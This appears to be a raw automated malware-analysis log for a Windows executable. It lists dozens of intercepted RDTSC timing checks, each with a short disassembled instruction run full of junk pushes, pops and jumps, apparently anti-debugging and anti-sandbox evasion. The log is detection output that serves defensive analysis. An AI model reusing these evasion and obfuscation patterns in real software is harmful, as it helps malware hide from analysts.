Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11BA969 second address: 11BA974 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FE66CCE6056h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D0BA7 second address: 11D0BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007FE66CFB4FE1h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE66CFB4FDDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D0A01 second address: 11D0A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D470B second address: 11D4716 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FE66CFB4FD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D49EF second address: 11D49F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D49F7 second address: 11D4A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007FE66CFB4FDCh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D4E37 second address: 11D4E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D4E47 second address: 11D4E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D4E4D second address: 11D4E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D4E52 second address: 11D4E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE66CFB4FD6h 0x0000000a jng 00007FE66CFB4FD6h 0x00000010 popad 0x00000011 push edi 0x00000012 jbe 00007FE66CFB4FD6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D4F8C second address: 11D4F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D515E second address: 11D5176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FE66CFB4FD6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D5176 second address: 11D517A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D5434 second address: 11D543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D543A second address: 11D545E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FE66CCE6068h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D545E second address: 11D5462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D5462 second address: 11D5466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D5466 second address: 11D546C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D9B57 second address: 11D9B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11D9B5B second address: 11D9B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11DADAE second address: 11DADBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE66CCE6056h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11DADBD second address: 11DADC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11DADC4 second address: 11DADCE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE66CCE605Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11DE4B0 second address: 11DE4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11DE4B4 second address: 11DE4B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11DE4B8 second address: 11DE4C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11DE4C1 second address: 11DE4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 587018D second address: 58701DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE66CFB4FE1h 0x00000009 add ax, 13A6h 0x0000000e jmp 00007FE66CFB4FE1h 0x00000013 popfd 0x00000014 mov ax, 52D7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FE66CFB4FDAh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE66CFB4FDDh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58701DD second address: 58701E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58701E1 second address: 58701E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58701E7 second address: 58701ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58701ED second address: 58701F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850F4C second address: 5850F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE66CCE605Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850F6F second address: 5850F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850F75 second address: 5850F7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58A0016 second address: 58A00BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e movzx esi, dx 0x00000011 popad 0x00000012 jmp 00007FE66CFB4FDDh 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FE66CFB4FE1h 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FE66CFB4FDCh 0x00000026 and esi, 3636A738h 0x0000002c jmp 00007FE66CFB4FDBh 0x00000031 popfd 0x00000032 movzx eax, bx 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FE66CFB4FDBh 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FE66CFB4FDBh 0x00000047 sub al, FFFFFFAEh 0x0000004a jmp 00007FE66CFB4FE9h 0x0000004f popfd 0x00000050 call 00007FE66CFB4FE0h 0x00000055 pop ecx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58A00BF second address: 58A00DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CCE6067h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5830131 second address: 5830135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5830135 second address: 583013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 583013B second address: 5830155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5830155 second address: 5830159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5830159 second address: 583015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 585070B second address: 585071A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 585071A second address: 58507B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FE66CFB4FDCh 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007FE66CFB4FE0h 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushad 0x0000001c mov edi, ecx 0x0000001e pushfd 0x0000001f jmp 00007FE66CFB4FE8h 0x00000024 adc al, 00000018h 0x00000027 jmp 00007FE66CFB4FDBh 0x0000002c popfd 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007FE66CFB4FE8h 0x00000034 and eax, 3C5DAD78h 0x0000003a jmp 00007FE66CFB4FDBh 0x0000003f popfd 0x00000040 popad 0x00000041 pop ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FE66CFB4FE5h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58506AB second address: 58506B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58506B1 second address: 58506B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 585036A second address: 5850370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850370 second address: 58503E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE66CFB4FE3h 0x00000016 xor al, 0000007Eh 0x00000019 jmp 00007FE66CFB4FE9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FE66CFB4FE0h 0x00000025 or si, 7478h 0x0000002a jmp 00007FE66CFB4FDBh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58503E8 second address: 58503EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58503EE second address: 5850406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850406 second address: 585040A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 585040A second address: 5850425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850425 second address: 585043D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CCE6064h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58602EA second address: 5860331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE66CFB4FDEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE66CFB4FE7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5860331 second address: 5860337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5860337 second address: 586033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890EE9 second address: 5890EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890EEF second address: 5890EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890EF3 second address: 5890F1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE66CCE6065h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890F1C second address: 5890F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890F22 second address: 5890F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890F26 second address: 5890F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5870521 second address: 5870525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5870525 second address: 5870529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5870529 second address: 587052F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 587052F second address: 587058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE66CFB4FE5h 0x00000009 and cx, B4A6h 0x0000000e jmp 00007FE66CFB4FE1h 0x00000013 popfd 0x00000014 call 00007FE66CFB4FE0h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE66CFB4FE3h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 587058E second address: 58705AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58705AB second address: 58705B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 585053A second address: 585055B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE66CCE605Fh 0x00000008 pop esi 0x00000009 mov bh, BFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 mov dh, 27h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 585055B second address: 5850598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov edi, 348F8A50h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE66CFB4FE4h 0x00000016 xor ax, 6698h 0x0000001b jmp 00007FE66CFB4FDBh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov ecx, 529CF0E5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850598 second address: 5850600 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE66CCE6062h 0x00000008 sub si, 10F8h 0x0000000d jmp 00007FE66CCE605Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov si, dx 0x0000001d pushfd 0x0000001e jmp 00007FE66CCE6067h 0x00000023 sub si, 396Eh 0x00000028 jmp 00007FE66CCE6069h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850600 second address: 5850606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850606 second address: 585060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 585060A second address: 5850643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b call 00007FE66CFB4FE5h 0x00000010 mov edx, esi 0x00000012 pop eax 0x00000013 mov al, dh 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edx, cx 0x0000001d call 00007FE66CFB4FDAh 0x00000022 pop ecx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850643 second address: 5850649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5850649 second address: 585064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58700DF second address: 58700F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CCE605Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58700F1 second address: 5870157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ah, AEh 0x0000000c pushfd 0x0000000d jmp 00007FE66CFB4FDFh 0x00000012 adc cl, FFFFFFFEh 0x00000015 jmp 00007FE66CFB4FE9h 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 jmp 00007FE66CFB4FDCh 0x00000025 mov cx, F3D1h 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FE66CFB4FE3h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5870157 second address: 587015D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5870361 second address: 5870366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890728 second address: 58907B9 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, di 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FE66CCE605Eh 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FE66CCE6060h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov cx, 272Dh 0x0000001d pushad 0x0000001e jmp 00007FE66CCE6068h 0x00000023 pushfd 0x00000024 jmp 00007FE66CCE6062h 0x00000029 and si, DE28h 0x0000002e jmp 00007FE66CCE605Bh 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007FE66CCE6066h 0x0000003c push eax 0x0000003d pushad 0x0000003e mov cx, di 0x00000041 push eax 0x00000042 push edx 0x00000043 mov ax, dx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58907B9 second address: 58908D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FE66CFB4FE1h 0x0000000f xor esi, 218D47A6h 0x00000015 jmp 00007FE66CFB4FE1h 0x0000001a popfd 0x0000001b jmp 00007FE66CFB4FE0h 0x00000020 popad 0x00000021 mov eax, dword ptr [775F65FCh] 0x00000026 jmp 00007FE66CFB4FE0h 0x0000002b test eax, eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FE66CFB4FDEh 0x00000034 or si, C7A8h 0x00000039 jmp 00007FE66CFB4FDBh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007FE66CFB4FE8h 0x00000045 or ax, 3A08h 0x0000004a jmp 00007FE66CFB4FDBh 0x0000004f popfd 0x00000050 popad 0x00000051 je 00007FE6DEC980DCh 0x00000057 jmp 00007FE66CFB4FE6h 0x0000005c mov ecx, eax 0x0000005e pushad 0x0000005f mov cl, DBh 0x00000061 pushfd 0x00000062 jmp 00007FE66CFB4FE3h 0x00000067 xor ah, FFFFFFAEh 0x0000006a jmp 00007FE66CFB4FE9h 0x0000006f popfd 0x00000070 popad 0x00000071 xor eax, dword ptr [ebp+08h] 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 call 00007FE66CFB4FE8h 0x0000007c pop eax 0x0000007d mov bx, FE96h 0x00000081 popad 0x00000082 rdtsc
